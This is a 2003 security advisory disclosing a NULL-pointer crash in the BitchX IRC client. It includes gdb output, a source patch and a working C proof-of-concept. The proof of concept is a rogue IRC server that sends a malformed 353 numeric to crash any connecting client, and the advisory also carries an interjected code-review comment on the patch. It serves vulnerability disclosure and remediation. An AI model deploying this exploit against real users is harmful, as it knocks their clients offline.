 
argv_at_hushmail.com
Date: Sun Feb 16 2003 - 22:39:52 CST


    -----BEGIN PGP SIGNED MESSAGE-----

    Mon Feb 17 15:26:06 EST 2003

    1. Topic:
            BitchX IRC Client

    2. Relevant versions:
            Vulnerable:
                    BitchX-75p3
                    BitchX-1.0c16
                    BitchX-1.0c19
                    BitchX-1.0c20cvs
            Not Vulnerable:
                    BitchX-1.0c18

    3. Problem description:
            A denial of service vulnerability exists in BitchX. Sending
            a malformed RPL_NAMREPLY numeric 353 causes BitchX to segfault.
            The crash is a NULL pointer dereference: when the numeric carries
            fewer parameters than funny_namreply() expects, Args[2] ("line")
            is NULL and the name-counting loop dereferences it (in the gdb
            output below, %edi is 0 at the faulting cmpb).
            This problem was reported to panasync@efnet#bitchx on
            Jan 30 2003; as of this writing we are unaware of any patches
            or workarounds provided by panasync or any members of
            #bitchx.

    4. Workaround:
            Patch Included
            Use epic, ircII

    5. References:
            http://www.bitchx.org
            http://www.epicsol.org
            http://www.ircii.org

    6. Contact:
            argv@hushmail.com

    - -----begin gdb.output-----
    argvblack:~/BitchX_353/BitchX/source$ gdb ./BitchX
    Reading symbols from ./BitchX...done.
    (gdb) r argv.matrux.net
    Starting program: /home/argv/BitchX_353/BitchX/source/./BitchX argv.matrux.net
    BitchX - Based on EPIC Software Labs epic ircII (1998).
    Version (BitchX-1.0c20cvs) -- Date (20020325).
    Process [30890]
    Program received signal SIGSEGV, Segmentation fault.
    0x80bcdff in funny_namreply ()
    (gdb) info reg
    eax 0x0 0
    ecx 0xbfffcf34 -1073754316
    edx 0x0 0
    ebx 0xbfffcf2c -1073754324
    esp 0xbfffcc94 0xbfffcc94
    ebp 0xbfffd7b5 0xbfffd7b5
    esi 0xbfffd7b8 -1073752136
    edi 0x0 0
    eip 0x80bcdff 0x80bcdff
    eflags 0x10282 66178
    cs 0x23 35
    ss 0x2b 43
    ds 0x2b 43
    es 0x2b 43
    fs 0x0 0
    gs 0x0 0
    fctrl 0x37f 895
    fstat 0x20 32
    ftag 0xffff 65535
    fiseg 0x23 35
    fioff 0x80d1c7c 135076988
    foseg 0x2b 43
    fooff 0xbfffe130 -1073749712
    fop 0x0 0
    (gdb) disass $eip-0x20 $eip+0x20
    Dump of assembler code from 0x80bcddf to 0x80bce1f:
    0x80bcddf <funny_namreply+19>: sbb $0x0,%al
    0x80bcde1 <funny_namreply+21>: add %al,(%eax)
    0x80bcde3 <funny_namreply+23>: add %al,0x26af8c4(%ebx)
    0x80bcde9 <funny_namreply+29>: push %ebx
    0x80bcdea <funny_namreply+30>: mov 0x318(%eax),%eax
    0x80bcdf0 <funny_namreply+36>: call *%eax
    0x80bcdf2 <funny_namreply+38>: mov (%ebx),%ebp
    0x80bcdf4 <funny_namreply+40>: mov 0x4(%ebx),%esi
    0x80bcdf7 <funny_namreply+43>: mov 0x8(%ebx),%edi
    0x80bcdfa <funny_namreply+46>: mov %edi,%edx
    0x80bcdfc <funny_namreply+48>: add $0x10,%esp
    0x80bcdff <funny_namreply+51>: cmpb $0x0,(%edi)
    0x80bce02 <funny_namreply+54>: je 0x80bce2f <funny_namreply+99>
    0x80bce04 <funny_namreply+56>: mov 0x1c(%esp,1),%ecx
    0x80bce08 <funny_namreply+60>: inc %ecx
    0x80bce09 <funny_namreply+61>: cmpb $0x20,(%edx)
    0x80bce0c <funny_namreply+64>: je 0x80bce1b <funny_namreply+79>
    0x80bce0e <funny_namreply+66>: mov %esi,%esi
    0x80bce10 <funny_namreply+68>: inc %edx
    0x80bce11 <funny_namreply+69>: mov (%edx),%al
    0x80bce13 <funny_namreply+71>: test %al,%al
    0x80bce15 <funny_namreply+73>: je 0x80bce1b <funny_namreply+79>
    0x80bce17 <funny_namreply+75>: cmp $0x20,%al
    0x80bce19 <funny_namreply+77>: jne 0x80bce10 <funny_namreply+68>
    0x80bce1b <funny_namreply+79>: mov %ecx,0x1c(%esp,1)
    End of assembler dump.
    - -----end gdb.output-----

    - -----begin BitchX-1.0c20cvs-353.diff-----
    diff -Nru BitchX.orig/source/funny.c BitchX/source/funny.c
    - --- BitchX.orig/source/funny.c Sun Feb 16 18:34:16 2003
    +++ BitchX/source/funny.c Sun Feb 16 18:39:56 2003
    -260,7 +260,10
            type = Args[0];
            channel = Args[1];
            line = Args[2];
    - -
    + if (channel == NULL || line == NULL) {
    + bitchsay("Invalid number of arguments for %s", __FUNCTION__);
    + return;
    + }
            ptr = line;
            while (*ptr)
            {
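Review bot: `__FUNCTION__` in the added bitchsay() call is a GCC extension; the C99 spelling `__func__` is portable and equivalent, so `bitchsay("Invalid number of arguments for %s", __func__);` would be preferable unless the codebase already relies on `__FUNCTION__` elsewhere. As pasted here the patch is PGP dash-escaped (`- ---`, `- -`) and the hunk header has lost its `@@` markers, so it must be un-escaped and the header restored before patch(1) will apply it. funny_namreply() begins and ends outside the hunk, so whether `type` (Args[0]) needs the same NULL guard cannot be judged from this excerpt.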
    - -----end BitchX-1.0c20cvs-353.diff-----

    - -----begin bitchx-353.c-----
    /*
     * bitchx-353.c
     * --argv
     * Jan/30/03
     *
     * Vulnerable:
     * BitchX-75p3
     * BitchX-1.0c16
     * BitchX-1.0c19
     * BitchX-1.0c20cvs
     *
     * Not Vulnerable:
     * BitchX-1.0c18 (So far..)
     *
     *
     * Workaround:
     * in function funny_namreply()
     * after the PasteArgs(Args, 2);
     * add in
     * -- snip --
     * if (Args[1] == NULL || Args[2] == NULL)
     * return;
     * -- unsnip --
     *
     * ---- the vuln code of bx -----
     * PasteArgs(Args, 2);
     * type = Args[0];
     * channel = Args[1];
     * line = Args[2];
     *
     * ptr = line;
     * while (*ptr)
     * {
     * while (*ptr && (*ptr != ' '))
     * ptr++;
     * user_count++;
     * while (*ptr && (*ptr == ' '))
     * ptr++;
     * }
     * ------------------------------
     *
     * [panasync(panasync@colossus.melnibone.org)] you would hope the irc server would be a trusted source.
     * [hellman(hellman@ipv6.gi-1.au.reroute.se)] 'Free porn at /server irc.owned.com'
     *
     */

    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>
    #include <unistd.h>
    #include <sys/types.h>
    #include <sys/socket.h>
    #include <netinet/in.h>
    #include <arpa/inet.h>
    #include <netdb.h>

    /*
     * The trigger line: an RPL_NAMREPLY (353) whose trailing parameter is
     * empty. After PasteArgs() the vulnerable funny_namreply() takes Args[2]
     * as `line` and walks it without a NULL check (see the snippet in the
     * header comment above), so this short line is enough to fault the client.
     */
    static char shellcode[] = ":* 353 * = :\n"; // written verbatim by main() to every client

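    /*
     * Accept one pending connection on the listening socket fd.
     *
     * Returns the connected descriptor, or -1 (errno set) when accept()
     * fails. The peer address is printed only on success.
     */
    int acceptConnection(int fd)
    {
       struct sockaddr_in sa;
       socklen_t sal = sizeof sa;   /* accept() takes socklen_t *, not int * */
       int descriptor = accept(fd, (struct sockaddr *) &sa, &sal);

       if (descriptor >= 0) {
          /* inet_ntoa() returns a static buffer; it is consumed immediately here */
          printf("Connection from %s:%d\n", inet_ntoa(sa.sin_addr), ntohs(sa.sin_port));
       }
       return descriptor;
    }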

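    /*
     * Entry point: listen on a TCP port (argv[1], default 6667) and write the
     * single line in `shellcode` to every client that connects, then close it.
     *
     * Returns 1 when the port argument is invalid or a socket call fails;
     * otherwise it serves connections until accept() fails.
     */
    int main(int argc, char **argv)
    {
       int port = 6667;
       int reuse = 1;                /* SO_REUSEADDR expects a non-zero int */
       struct sockaddr_in server;

       if (argc > 1) {
          /* strtol rather than atoi so junk or out-of-range ports are rejected */
          char *end = NULL;
          long p = strtol(argv[1], &end, 10);
          if (end == argv[1] || *end != '\0' || p < 1 || p > 65535) {
             fprintf(stderr, "invalid port: %s\n", argv[1]);
             return 1;
          }
          port = (int) p;
       }

       memset(&server, 0, sizeof server);
       server.sin_family = AF_INET;
       server.sin_port = htons((unsigned short) port);
       server.sin_addr.s_addr = INADDR_ANY;

       int sock = socket(AF_INET, SOCK_STREAM, IPPROTO_IP);
       if (sock == -1) {
          perror("socket");
          return 1;
       }
       /* the original passed an uninitialised int as the option value */
       setsockopt(sock, SOL_SOCKET, SO_REUSEADDR, &reuse, sizeof reuse);

       if (bind(sock, (struct sockaddr *) &server, sizeof server) == -1) {
          perror("bind");
          close(sock);
          return 1;
       }
       if (listen(sock, 1) == -1) {
          perror("listen");
          close(sock);
          return 1;
       }

       for (;;) {
          int client = acceptConnection(sock);
          if (client == -1) {
             /* the original wrote to fd -1 here; stop instead of spinning */
             perror("accept");
             break;
          }
          /* payload is a dozen bytes; a short write is reported, not retried */
          if (write(client, shellcode, strlen(shellcode)) == -1) {
             perror("write");
          }
          close(client);
       }

       close(sock);
       return 1;
    }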
    - -----end bitchx-353.c-----

    -----BEGIN PGP SIGNATURE-----
    Version: Hush 2.2 (Java)
    Note: This signature can be verified at https://www.hushtools.com/verify

    wlkEARECABkFAj5QZQcSHGFyZ3ZAaHVzaG1haWwuY29tAAoJEO/BXrpp9BkpPtwAn0ty
    A6Vhvj6/RKsLKAjqfGZPdWVnAKCQd8a31hr7pdKMHIyerDZ86s8xGA==
    =yF3L
    -----END PGP SIGNATURE-----
